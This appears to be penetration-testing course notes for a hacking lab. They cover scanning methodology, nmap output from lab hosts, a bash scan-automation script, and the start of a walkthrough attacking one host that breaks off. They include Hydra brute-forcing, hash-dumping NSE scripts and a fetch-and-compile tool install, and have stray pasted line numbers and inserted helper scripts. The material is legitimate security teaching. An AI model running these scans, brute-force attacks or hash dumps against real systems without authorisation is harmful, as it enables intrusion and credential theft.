Sep 05, 2019, 11:08 PM
The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.


Issue 1. Lack of a thorough attack process
==========================================
 - Host discovery
 - Service discovery
 - Service version discovery
 - Vulnerability research
 - Linux (port 111)/Windows (port 445) enumeration
 - Webserver vulnerability scan
 - Directory brute force every webserver
 - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
 - Brute force all services


Issue 2. Lack of automation of the process
==========================================
 - Research attack scripts on the internet to enhance your methodology


Issue 3. Failing to document all steps being performed and their output
=======================================================================


Issue 4. Lack of sleep during the exam
======================================


Issue 5. Failing to reboot target machines prior to attack
==========================================================



--------------------------------------------------------------------------------------------------------------


A good strategy to use to prepare would be:

Step 1. Ensure that you are comfortable with Linux
--------------------------------------------------
- LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
- CompTIA Linux+ (you should be just a hair under a Linux system administrator in skill level, comfortable with simple shell scripting, and well beyond a Linux user skill level)

You should be very comfortable with the material covered in the videos below (go through all of them twice if you are new to Linux):
https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E



Step 2. You should be comfortable with the following tools:
-----------------------------------------------------------

Nmap:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo

Metasploit:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja

Burp Suite:
https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

Sqlmap:
https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75

Nikto:
https://www.youtube.com/watch?v=GH9qn_DBzCk

Enum4Linux:
https://www.youtube.com/watch?v=hA5raaGOQKQ

RPCINFO/SHOWMOUNT:
https://www.youtube.com/watch?v=FlRAA-1UXWQ

Hydra:
https://www.youtube.com/watch?v=rLtj8tEmGso



Step 3. You need to be comfortable with basic exploit development
-----------------------------------------------------------------

Basic assembly:
https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB

Basic exploit development (first 5 videos in the playlist):
https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl


Step 4. You need to be comfortable with privilege escalation
------------------------------------------------------------
Linux
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Windows
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
http://www.fuzzysecurity.com/tutorials/16.html



#################################
# Day 1: Advanced Scanning Labs #
#################################


########################
# Scanning Methodology #
########################

- Ping Sweep
What's alive?
------------

---------------------------Type This-----------------------------------
sudo nmap -sP 157.166.226.*

-----------------------------------------------------------------------



 - If -sP yields no results, try:
---------------------------Type This-----------------------------------
sudo nmap -sL 157.166.226.*

-----------------------------------------------------------------------



 - Look for hostnames:
---------------------------Type This-----------------------------------
sudo nmap -sL 157.166.226.* | grep com

-----------------------------------------------------------------------



- Port Scan
What's where?
------------
---------------------------Type This-----------------------------------
sudo nmap -sS 162.243.126.247

-----------------------------------------------------------------------



- Bannergrab/Version Query
What versions of software are running?
--------------------------------------

---------------------------Type This-----------------------------------
sudo nmap -sV 162.243.126.247

-----------------------------------------------------------------------




- Vulnerability Research
Look up the banner versions for public exploits
-----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/




--------------------------------------------------------------------------------------------------------------
Some tools to install:
---------------------------Type This-----------------------------------
wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
gcc propecia.c -o propecia
sudo cp propecia /bin
-----------------------------------------------------------------------




##############################
# Scanning Process to follow #
##############################

Step 1: Host Discovery
----------------------

---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24

nmap -sL 172.31.2.0/24

nmap -sS --open -p 22,445 172.31.2.0/24

propecia 172.31.2 22 > file1
propecia 172.31.2 445 > file2
cat file1 file2 > file3
cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
cat lab.txt
-----------------------------------------------------------------------


Step 2: Port Scan
-----------------
nmap -sS <IP-ADDRESS>
nmap -sU -p 69,161 <IP-ADDRESS>


---------------------------Type This-----------------------------------
sudo nmap -sS 172.31.2.0/24
sudo nmap -sU -p 69,161 172.31.2.0/24
-----------------------------------------------------------------------


Step 3: Bannergrab
------------------
nmap -sV <IP-ADDRESS>
nmap -sV -p- <IP-ADDRESS>
 |
 ----> Vulnerability Research

---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.0/24
-----------------------------------------------------------------------




Step 4: Enumerate common Windows/Linux file sharing services
------------------------------------------------------------
Step 3 is where most people STOP; you need to move on and look deeper.

---------------------------Type This-----------------------------------
sudo apt install smbclient libnss-winbind winbind
git clone https://github.com/portcullislabs/enum4linux.git
cd enum4linux/
perl enum4linux.pl -U 172.31.2.11

nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.86
-----------------------------------------------------------------------



Step 5: Vulnerability Scan the webservers
-----------------------------------------
git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h <IP-ADDRESS>



Step 6: Directory Bruteforce every webserver
--------------------------------------------
sudo apt install -y libcurl4-openssl-dev

git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

./dirb

./dirb http://<IP-ADDRESS> wordlists/big.txt





Step 7: Analyze source code of all webpages found
-------------------------------------------------
lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links

If you ever need to download an entire web site, perhaps for off-line viewing, wget can do the job. For example:

$ wget \
 --recursive \
 --no-clobber \
 --page-requisites \
 --html-extension \
 --convert-links \
 --restrict-file-names=windows \
 --domains website.org \
 --no-parent \
 www.website.org/tutorials/html/


This command downloads the web site www.website.org/tutorials/html/.

The options are:

--recursive: download the entire web site.

--domains website.org: don't follow links outside website.org.

--no-parent: don't follow links outside the directory tutorials/html/.

--page-requisites: get all the elements that compose the page (images, CSS and so on).

--html-extension: save files with the .html extension.

--convert-links: convert links so that they work locally, off-line.

--restrict-file-names=windows: modify filenames so that they will work in Windows as well.

--no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).



Step 8: Bruteforce any services you find
----------------------------------------
sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev
cd ~/toolz
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS>
hydra -l user -P passlist.txt ftp://<IP-ADDRESS>



330
331##################
332# Host Discovery #
333##################
334
335Reason:
336-------
337You have to discover the reachable hosts in the network before you can attack them.
338
339
340Hosts discovery syntax:
341-----------------------
342 nmap -sP 172.31.2.0/24
343 propecia 172.31.2 22 > file1
344 propecia 172.31.2 445 > file2
345 cat file1 file2 > file3
346 cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
347 cat lab.txt
348
349Issues:
350-------
351Issue we had to deal with was hosts that didn't respond to ICMP
352
353
354 Hosts discovered:
355 -----------------
356 172.31.2.11
357 172.31.2.14
358 172.31.2.47
359 172.31.2.64
360 172.31.2.86
361 172.31.2.117
362 172.31.2.157
363 172.31.2.217
364 172.31.2.238
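The host-discovery pipeline above merges two propecia output files and sorts them on the third and fourth octets only, which works as long as every host sits in the same /16. As an added example (not part of the course notes and not propecia's own code), the POSIX shell functions below generalise that step: they keep only well-formed dotted-quad lines, sort on all four octets, drop duplicates, and then diff a ping-sweep list against a TCP-probe list to surface exactly the hosts that ignored ICMP, the issue noted above. The file names and addresses in the demo are constructed for the demonstration, not real scan output.

```shell
#!/bin/sh
# Added example, not from the course notes: merge and sort scanner host lists.

# merge_host_lists FILE... : print every well-formed IPv4 address found in the
# given files, one per line, sorted numerically on all four octets, no duplicates.
# Lines that are not a single dotted quad (headers, prose, octets > 255) are dropped.
merge_host_lists() {
    cat "$@" | awk '
        /^[[:space:]]*[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+[[:space:]]*$/ {
            gsub(/[[:space:]]/, "")
            split($0, o, ".")
            if (o[1] <= 255 && o[2] <= 255 && o[3] <= 255 && o[4] <= 255) print
        }' | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n | uniq
}

# hosts_missed_by_ping PING_LIST TCP_LIST : addresses that answered a TCP probe
# but are absent from the ICMP sweep, i.e. the hosts a ping-only sweep would miss.
hosts_missed_by_ping() {
    ping_sorted=$(mktemp)
    merge_host_lists "$1" > "$ping_sorted"
    # -F fixed strings, -x whole line, -v invert: keep TCP hosts not in the ping list
    merge_host_lists "$2" | grep -v -x -F -f "$ping_sorted"
    rm -f "$ping_sorted"
}

# --- stand-alone demo with constructed sample files (not real scan output) ---
demo_dir=$(mktemp -d)
printf '172.31.2.117\n172.31.2.11\n172.31.2.47\n' > "$demo_dir/ping_hosts"
printf '172.31.2.11\n172.31.2.86\n999.1.1.1\n' > "$demo_dir/port22_hosts"
printf 'Host list:\n172.31.2.14\n172.31.2.11\n  172.31.2.86\n' > "$demo_dir/port445_hosts"

echo "All hosts:"
merge_host_lists "$demo_dir/ping_hosts" "$demo_dir/port22_hosts" "$demo_dir/port445_hosts"
echo "Hosts that ignored ICMP:"
cat "$demo_dir/port22_hosts" "$demo_dir/port445_hosts" > "$demo_dir/tcp_hosts"
hosts_missed_by_ping "$demo_dir/ping_hosts" "$demo_dir/tcp_hosts"
rm -rf "$demo_dir"
```

Feeding the ping-sweep list and the propecia lists from the lab through hosts_missed_by_ping gives you a written record of which hosts only showed up on a TCP probe, which is worth keeping in your notes (Issue 3) because it tells you which hosts are filtering ICMP and may also be filtering other probes.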





#####################
# Service Discovery #
#####################

Reason:
-------
Identifying what services are running on what hosts allows you to map the network topology.



Port Scan syntax:
 sudo nmap -sS -Pn -iL lab.txt
 sudo nmap -sU -p69,161 -Pn -iL lab.txt



Services discovered:
--------------------

joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt

Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
Nmap scan report for 172.31.2.11
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
21/tcp open ftp
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
9999/tcp open abyss

Nmap scan report for 172.31.2.11
Host is up.

PORT STATE SERVICE
69/udp open|filtered tftp
161/udp open|filtered snmp


Nmap scan report for 172.31.2.14
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
21/tcp open ftp
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
9999/tcp open abyss


Nmap scan report for 172.31.2.14
Host is up.

PORT STATE SERVICE
69/udp open|filtered tftp
161/udp open|filtered snmp


Nmap scan report for 172.31.2.47
Host is up (0.086s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap scan report for 172.31.2.64
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6667/tcp open irc

Nmap scan report for 172.31.2.86
Host is up (0.086s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
8080/tcp open http-proxy

Nmap scan report for 172.31.2.117
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2020/tcp open xinupageserver

Nmap scan report for 172.31.2.157
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Nmap scan report for 172.31.2.217
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3260/tcp open iscsi

Nmap scan report for 172.31.2.238
Host is up (0.087s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6969/tcp open acmsoda

Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds









502
503##############################################
504# Service Version Discovery (Bannergrabbing) #
505##############################################
506Reason:
507-------
508Identifying what versions of services are running on what hosts allows for you to determine if the hosts are vulnerable to attack.
509
510
511
512Port Scan syntax:
513
514joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt
515
516Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
517Nmap scan report for 172.31.2.11
518Host is up (0.087s latency).
519Not shown: 995 filtered ports
520PORT STATE SERVICE VERSION
52121/tcp open ftp FreeFloat ftpd 1.00
522139/tcp open netbios-ssn Microsoft Windows netbios-ssn
523445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
5243389/tcp open ms-wbt-server Microsoft Terminal Service
5259999/tcp open abyss?
526Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
527
528Nmap scan report for 172.31.2.14
529Host is up (0.087s latency).
530Not shown: 995 filtered ports
531PORT STATE SERVICE VERSION
53221/tcp open ftp FreeFloat ftpd 1.00
533139/tcp open netbios-ssn Microsoft Windows netbios-ssn
534445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
5353389/tcp open ms-wbt-server Microsoft Terminal Service
5369999/tcp open abyss?
537Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
538
539Nmap scan report for 172.31.2.47
540Host is up (0.087s latency).
541Not shown: 998 closed ports
542PORT STATE SERVICE VERSION
54322/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
54480/tcp open http Apache httpd 2.2.22 ((Ubuntu))
545Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
546
547Nmap scan report for 172.31.2.64
548Host is up (0.087s latency).
549Not shown: 997 closed ports
550PORT STATE SERVICE VERSION
55122/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
55280/tcp open http Apache httpd 2.4.7 ((Ubuntu))
5536667/tcp open irc ngircd
554Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
555
556Nmap scan report for 172.31.2.86
557Host is up (0.087s latency).
558Not shown: 989 closed ports
559PORT STATE SERVICE VERSION
56022/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
56153/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
56280/tcp open http Apache httpd 2.4.7 ((Ubuntu))
563110/tcp open pop3 Dovecot pop3d
564111/tcp open rpcbind 2-4 (RPC #100000)
565139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
566143/tcp open imap Dovecot imapd (Ubuntu)
567445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
568993/tcp open ssl/imap Dovecot imapd (Ubuntu)
569995/tcp open ssl/pop3 Dovecot pop3d
5708080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
571Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:campmoca;:ubuntu_linux
572
573Nmap scan report for 172.31.2.117
574Host is up (0.086s latency).
575Not shown: 997 closed ports
576PORT STATE SERVICE VERSION
57722/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
57880/tcp open http Apache httpd 2.4.7 ((Ubuntu))
5792020/tcp open ftp vsftpd 2.0.8 or later
580Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel
581
582Nmap scan report for 172.31.2.157
583Host is up (0.086s latency).
584Not shown: 997 closed ports
585PORT STATE SERVICE VERSION
58621/tcp open ftp vsftpd 2.0.8 or later
58722/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
58880/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
589
590Nmap scan report for 172.31.2.217
591Host is up (0.087s latency).
592Not shown: 997 closed ports
593PORT STATE SERVICE VERSION
59422/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
59580/tcp open http nginx
5963260/tcp open iscsi?
597Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
598
599Nmap scan report for 172.31.2.238
600Host is up (0.087s latency).
601Not shown: 997 closed ports
602PORT STATE SERVICE VERSION
60322/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
60480/tcp open http nginx 1.6.2
6056969/tcp open acmsoda?
606Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
607
608Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
609Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds
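Both the -sS and the -sV runs above produce nmap's normal output, which is easy to read but awkward to feed into the later steps or into the write-up the notes insist on (Issue 3). As an added example (not the course's and not nmap's own code), the POSIX shell functions below parse that format into one tab-separated row per confirmed-open port (host, port, protocol, service, version) and filter it to the hosts exposing a given port, so the per-service host lists the course builds with propecia can be derived from a single nmap run instead. The report embedded in the block is an abridged copy of the -sV output above, not a new scan. nmap's own -oG (grepable) and -oX (XML) options give machine-readable output directly; this parser is for the normal output you already have in your notes.

```shell
#!/bin/sh
# Added example, not from the course notes: turn nmap "normal" output into rows.

# parse_nmap_open_ports : read an nmap normal-output report on stdin and print
# one tab-separated row per port whose STATE is exactly "open":
#   host  port  proto  service  version
# Ports reported as open|filtered (typical for UDP) are deliberately left out,
# since nmap has not confirmed a listener there.
parse_nmap_open_ports() {
    awk '
        BEGIN { OFS = "\t"; host = "" }
        # "Nmap scan report for 1.2.3.4" or "Nmap scan report for name (1.2.3.4)"
        /^Nmap scan report for / {
            host = $5
            if ($6 ~ /^\(/) { host = $6; gsub(/[()]/, "", host) }
        }
        # port lines look like "445/tcp  open  microsoft-ds  Microsoft Windows ..."
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" && host != "" {
            split($1, p, "/")
            version = ""
            for (i = 4; i <= NF; i++) version = (version == "" ? $i : version " " $i)
            print host, p[1], p[2], $3, version
        }'
}

# hosts_with_port PORT : hosts from the report on stdin that have PORT open
hosts_with_port() {
    parse_nmap_open_ports | awk -F '\t' -v port="$1" '$2 == port { print $1 }' | sort -u
}

# Constructed sample: an abridged copy of the -sV scan shown in the notes.
sample_scan() {
    cat <<'EOF'
Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
Nmap scan report for 172.31.2.11
Host is up (0.087s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FreeFloat ftpd 1.00
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
9999/tcp open  abyss?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 172.31.2.86
Host is up (0.087s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
111/tcp  open  rpcbind       2-4 (RPC #100000)
445/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
69/udp   open|filtered tftp
Nmap done: 2 IP addresses (2 hosts up) scanned in 1.00 seconds
EOF
}

echo "Open ports (host, port, proto, service, version):"
sample_scan | parse_nmap_open_ports
echo "Hosts with 445/tcp open:"
sample_scan | hosts_with_port 445
```

To use it on the lab, replace sample_scan with `cat scan.txt` (the saved output of the -sV run) and redirect hosts_with_port 445 to the same kind of per-service file the propecia loop produces; the tab-separated rows also paste straight into a spreadsheet for the vulnerability-research step.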






--------------------------------------------------------------------------------------------------------------

#!/bin/bash

# Script made during the CyberWar class for the students to play with, debug, and improve.
# Take a look at the following websites for ideas:
# https://github.com/commonexploits/port-scan-automation
# https://www.commonexploits.com/penetration-testing-scripts/
# https://github.com/averagesecurityguy/scripts
# https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py



# Some thoughts of things to add to this script:
# Shodan queries (API key)
# AWS scanning (need credentials)
# Jenkins scanning
# Active Directory enumeration
# Github scanning (API key required)
# Blockchain platforms







#############################################
# Check to see if script is running as root #
#############################################
if [ "$EUID" -ne 0 ]
then
  echo "Please run as root"
  exit 1
fi


####################################
# Check to see if gcc is installed #
####################################
file1="/usr/bin/gcc"
if [ -f "$file1" ]
then
  echo "$file1 is installed."
  clear
else
  echo "$file1 not found."
  echo "Installing gcc"
  apt-get install -y gcc
  clear
fi

########################
# Make the directories #
########################
cd /tmp
rm -rf customerAudit/
rm -rf NetworkAudit/
mkdir -p /tmp/NetworkAudit/discovered_services/
mkdir -p /tmp/NetworkAudit/scan/windows/
mkdir -p /tmp/NetworkAudit/scan/sunrpc/
mkdir -p /tmp/NetworkAudit/scan/ssh/
mkdir -p /tmp/NetworkAudit/scan/ftp/
mkdir -p /tmp/NetworkAudit/scan/http/
mkdir -p /tmp/NetworkAudit/scan/https/
mkdir -p /tmp/NetworkAudit/scan/telnet/
mkdir -p /tmp/NetworkAudit/scan/pop3/
mkdir -p /tmp/NetworkAudit/scan/printers/
mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/


#####################
# Download propecia #
#####################
file2="/bin/propecia"
if [ -f "$file2" ]
then
  echo "$file2 is installed."
  clear
else
  echo "$file2 not found."
  echo "Installing propecia"
  cd /tmp
  wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  gcc propecia.c -o propecia
  cp propecia /bin
fi

######################
# Find Windows Hosts #
######################
clear
echo "Scanning for windows hosts."
propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
clear
echo "Done scanning for windows hosts. FTP is next."


##################
# Find FTP Hosts #
##################
echo "Scanning for hosts running FTP."
propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
clear
echo "Done scanning for FTP hosts. SSH is next."

##################
# Find SSH Hosts #
##################
echo "Scanning for hosts running SSH."
propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
clear
echo "Done scanning for SSH hosts. POP3 is next."


###################
# Find POP3 Hosts #
###################
echo "Scanning for hosts running POP3."
propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
clear
echo "Done scanning for POP3 hosts. SunRPC is next."


#####################
# Find SunRPC Hosts #
#####################
echo "Scanning for hosts running SunRPC."
propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
clear
echo "Done scanning for SunRPC hosts. Telnet is next."


#####################
# Find Telnet Hosts #
#####################
echo "Scanning for hosts running Telnet."
propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
clear
echo "Done scanning for Telnet hosts. HTTP is next."


###################
# Find HTTP Hosts #
###################
echo "Scanning for hosts running HTTP"
propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
clear
echo "Done scanning for HTTP hosts. HTTPS hosts are next."


####################
# Find HTTPS Hosts #
####################
echo "Scanning for hosts running HTTPS"
propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
clear
echo "Done scanning for HTTPS hosts. Databases are next."


##################
# Find Databases #
##################
echo "Scanning for hosts running MS SQL Server"
propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
clear

echo "Scanning for hosts running Oracle"
propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
clear

echo "Scanning for hosts running Postgres"
propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
clear

echo "Scanning for hosts running MongoDB"
propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
clear

echo "Scanning for hosts running MySQL"
propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
clear
echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."


###############################
# Ok, let's do the NMAP files #
###############################
clear
# Windows
for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
echo "Done with Windows."

clear
# FTP
for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
echo "Done with FTP."

clear
# SSH
for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
echo "Done with SSH."

clear
# SUNRPC
for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
echo "Done with SunRPC."

clear
# POP3
for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg $x > /tmp/NetworkAudit/scan/pop3/$x ; done
echo "Done with POP3."

# clear
# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
# as a good reference for what nmap nse scripts to run against port 80 and 443
# for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
# echo "Done with HTTP."


# clear
# HTTPS Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
# as a good reference for what nmap nse scripts to run against port 80 and 443
# for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/https/$x ; done
# echo "Done with HTTPS."


clear
# SQL Servers
for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
echo "Done with MS SQL."

clear
# Oracle Servers
# FIX THIS: needs brute force wordlists for this to run correctly
# for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done
# echo "Done with Oracle."

clear
# MongoDB
for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
echo "Done with MongoDB."


clear
# MySQL Servers
for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done
echo "Done with MySQL."


# Add postgres nse scripts
# References:
# https://nmap.org/nsedoc/lib/pgsql.html
# https://nmap.org/nsedoc/scripts/pgsql-brute.html
#

echo " "
echo " "
sleep 1
clear
echo "Done, now check your results."
sleep 2
clear
cd /tmp/NetworkAudit/scan/
ls



888
889----------------------------------------------------------------------------------------------------------------------------
890-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
891-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
892--------------------------------------------------------------------------------------
893
894 ######################################
895----------- ############### # Day 2: Attacking Hosts in the lab ################ -----------
896 ######################################
897
898######################
899# Attacking Minotaur #
900######################
901
902Step 1: Portscan/Bannergrab the target host
903---------------------------Type This-----------------------------------
904sudo nmap -sV 172.31.2.117
905-----------------------------------------------------------------------
906
907
908
909Step 2: Vulnerability scan the web server
910---------------------------Type This-----------------------------------
911nikto.pl -h 172.31.2.117
912-----------------------------------------------------------------------
913
914
915
916Step 3: Directory brute-force the webserver
917---------------------------Type This-----------------------------------
918dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
919-----------------------------------------------------------------------
920
921### dirb output ###
922==> DIRECTORY: http://172.31.2.117/bull/
923-----------------------------------------------------------------------
924
925
926Step 4: Run wordpress vulnerability scanner
927---------------------------Type This-----------------------------------
